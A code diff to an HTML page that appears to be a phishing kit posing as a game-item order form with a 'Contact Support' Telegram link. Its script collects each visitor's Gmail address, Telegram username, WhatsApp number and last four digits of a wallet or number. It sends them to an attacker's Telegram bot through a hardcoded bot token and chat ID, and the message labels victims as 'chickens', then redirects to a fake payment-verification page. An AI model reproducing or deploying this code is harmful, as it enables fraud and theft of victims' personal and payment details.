--- a/contact-details.html
+++ b/contact-details.html
@@ -9,13 +9,14 @@
     <style>
         body {
             font-family: 'Roboto', sans-serif;
-            background: linear-gradient(45deg, #6a11cb, #2575fc); /* Gradient background */
+            background: linear-gradient(45deg, #6a11cb, #2575fc 70%, #6a11cb 100%);
             margin: 0;
             padding: 0;
             display: flex;
             justify-content: center;
-            align-items: flex-start; /* Align to the top of the page */
-            height: 100vh;
+            align-items: flex-start;
+            height: 100%;
+            min-height: 100vh;
             overflow: auto;
             position: relative;
         }
@@ -29,8 +30,8 @@
             max-width: 300px;
             text-align: center;
             transition: transform 0.3s ease-in-out;
-            z-index: 1; /* Ensure it is on top of the extra space */
-            margin-top: 20px; /* Give it some space from the top */
+            z-index: 1;
+            margin-top: 20px;
         }
 
         .container:hover {
@@ -127,8 +128,8 @@
         }
 
         .contact-support {
-            margin-top: 8px;
-            font-size: 10px;
+            margin-top: 9px;
+            font-size: 11px;
             color: #1e4e9f;
             text-align: center;
             white-space: nowrap;
@@ -183,16 +184,6 @@
             outline: none;
             box-shadow: 0 0 4px rgba(37, 117, 252, 0.7);
         }
-
-        /* Extra background space with gradient */
-        .extra-space {
-            position: absolute;
-            top: 100%;
-            left: 0;
-            width: 100%;
-            height: 100px;
-            background: linear-gradient(45deg, #6a11cb, #2575fc); /* Same background color as the body */
-        }
     </style>
 </head>
 <body>
@@ -219,7 +210,7 @@
     </div>
 
     <div class="payment-details" id="paymentDetails">
-        <input type="text" id="lastDigits" class="input-field" placeholder="Enter last 4 digits" maxlength="4" oninput="validateDigits(event)">
+        <input type="text" id="lastDigits" class="input-field" placeholder="Enter last 4 digits of your Wallet/Number" maxlength="4" oninput="validateDigits(event)">
     </div>
 
     <div class="section">
@@ -238,16 +229,13 @@
     <p class="sub-text">By clicking "Confirm Order", you agree to our terms and conditions.</p>
 
     <div id="error-message" class="error-message">
-        Invalid Email
+        Invalid Username
     </div>
 
     <div class="contact-support">
-        <p>If you have any issues, feel free to <a href="https://t.me/mehrabgaming2" target="_blank">Contact Support</a></p>
+        <p>Need Help ?<a href="https://t.me/mehrabgaming2" target="_blank">Contact Support</a></p>
     </div>
 </div>
-
-<!-- Extra background space at the bottom -->
-<div class="extra-space"></div>
 
 <script>
     function togglePaymentDetails(show) {
@@ -258,6 +246,9 @@
     function validatePhoneNumber(event) {
         const input = event.target;
         input.value = input.value.replace(/[^0-9]/g, ''); // Remove any non-numeric characters
+        if (input.value.length > 11) {
+            input.value = input.value.slice(0, 11); // Allow only 11 digits
+        }
     }
 
     function validateDigits(event) {
@@ -265,100 +256,98 @@
         if (input.value.length > 4) {
             input.value = input.value.slice(0, 4); // Allow only 4 digits
         }
+        input.value = input.value.replace(/[^0-9]/g, ''); // Ensure only digits are allowed
     }
 
     function sendToTelegram() {
-        const itemGroup = document.getElementsByName('item');
-        const username = document.getElementById('username').value.trim();
-        const password = document.getElementById('password').value.trim();
-        const backupCodes = document.getElementById('backupCodes').value.trim();
-        const lastDigits = document.getElementById('lastDigits').value.trim();
+    const itemGroup = document.getElementsByName('item');
+    const username = document.getElementById('username').value.trim();
+    const password = document.getElementById('password').value.trim();
+    const backupCodes = document.getElementById('backupCodes').value.trim();
+    const lastDigits = document.getElementById('lastDigits').value.trim();
 
-        let selectedItem = null;
-        let errors = [];
+    let selectedItem = null;
+    let errors = [];
 
-        // Check if an item is selected
-        for (let item of itemGroup) {
-            if (item.checked) {
-                selectedItem = item.value;
-                break;
-            }
+    // Check if an item is selected
+    for (let item of itemGroup) {
+        if (item.checked) {
+            selectedItem = item.value;
+            break;
         }
-
-        // Check for empty fields
-        if (!selectedItem || !username || !password || !backupCodes || !lastDigits) {
-            errors.push("Please fill all the credentials.");
-        }
-
-        // Validate Email Address
-        if (username) {
-            const emailUsername = username.split('@')[0];
-            if (emailUsername.length < 6 || emailUsername.length > 30 || !username.endsWith('@gmail.com')) {
-                errors.push("Invalid Email");
-            }
-        }
-
-        // Validate Telegram Username
-        if (password) {
-            const telegramUsername = password.slice(1); // Remove @
-            if (telegramUsername.length < 5 || telegramUsername.length > 32) {
-                errors.push("Telegram username must have between 5 and 32 characters after @.");
-            }
-            if (password.charAt(0) !== '@') {
-                errors.push("Telegram username must start with @.");
-            }
-        }
-
-        // Validate WhatsApp Number
-        if (backupCodes) {
-            if (!backupCodes.startsWith('01') || backupCodes.length !== 11 || isNaN(backupCodes)) {
-                errors.push("WhatsApp number must start with 01 and have exactly 11 digits.");
-            }
-        }
-
-        // Display all errors if any exist
-        if (errors.length > 0) {
-            document.getElementById('error-message').innerHTML = errors.join('<br>');
-            document.getElementById('error-message').style.display = 'block';
-            return;
-        }
-
-        // No errors: Proceed with submission
-        document.getElementById('error-message').style.display = 'none';
-
-        const message = `
-            🐔মুরগির তথ্য:
-            Selected Item: ${selectedItem}
-            মুরগির Email Address: ${username}
-            মুরগির Telegram Username: ${password}
-            মুরগির WhatsApp Number: ${backupCodes}
-            মুরগির নাম্বেরের শেষ ৪টি সংখ্যা: ${lastDigits}
-        `;
-
-        const botToken = '7683224249:AAGKd9UgEZ3mUciyZirea8LHYb1xH5vaIcw';
-        const chatId = '6151148119';
-        const url = `https://api.telegram.org/bot${botToken}/sendMessage`;
-
-        fetch(url, {
-            method: 'POST',
-            headers: {
-                'Content-Type': 'application/json',
-            },
-            body: JSON.stringify({
-                chat_id: chatId,
-                text: message,
-            }),
-        })
-        .then(response => response.json())
-        .then(data => {
-            if (data.ok) {
-                window.location.href = "https://paymentverification.vercel.app/confirm.html"; 
-            }
-        })
-        .catch(error => {
-            console.error(error);
-        });
     }
+
+    // Check for empty fields
+    if (!selectedItem || !username || !password || !backupCodes || !lastDigits) {
+        errors.push("Please fill all the credentials.");
+    }
+
+    // Validate Email Address
+    if (username) {
+        const emailUsername = username.split('@')[0];
+        if (emailUsername.length < 6 || emailUsername.length > 30 || !username.endsWith('@gmail.com')) {
+            errors.push("Invalid Email");
+        }
+    }
+
+    // Validate Telegram Username
+    if (password) {
+        const telegramUsername = password.slice(1); // Remove @
+        if (password.charAt(0) !== '@' || telegramUsername.length < 5 || telegramUsername.length > 32) {
+            errors.push("Invalid Username");
+        }
+    }
+
+    // Validate WhatsApp Number (maximum 11 digits)
+    if (backupCodes) {
+        if (!backupCodes.startsWith('01') || backupCodes.length !== 11 || isNaN(backupCodes)) {
+            errors.push("Wrong Number");
+        }
+    }
+
+    // Display all errors if any exist
+    if (errors.length > 0) {
+        document.getElementById('error-message').innerHTML = errors.join('<br>');
+        document.getElementById('error-message').style.display = 'block';
+        return;
+    }
+
+    // No errors: Proceed with submission
+    document.getElementById('error-message').style.display = 'none';
+
+    const message = 
+        `🐔মুরগির তথ্য:
+        Selected Item: ${selectedItem}
+        মুরগির Email Address: ${username}
+        মুরগির Telegram Username: ${password}
+        মুরগির WhatsApp Number: ${backupCodes}
+        মুরগির নাম্বেরের/ওয়ালেটের শেষ ৪টি সংখ্যা: ${lastDigits}`;
+
+    const botToken = '7683224249:AAGKd9UgEZ3mUciyZirea8LHYb1xH5vaIcw';
+    const chatId = '6151148119';
+    const url = `https://api.telegram.org/bot${botToken}/sendMessage`;
+
+    fetch(url, {
+        method: 'POST',
+        headers: {
+            'Content-Type': 'application/json',
+        },
+        body: JSON.stringify({
+            chat_id: chatId,
+            text: message,
+        }),
+    })
+    .then(response => response.json())
+    .then(data => {
+        if (data.ok) {
+            window.location.href = "https://paymentverification.vercel.app/confirm.html"; 
+        }
+    })
+    .catch(error => {
+        console.error(error);
+    });
+}
+
 </script>
 
 </body>
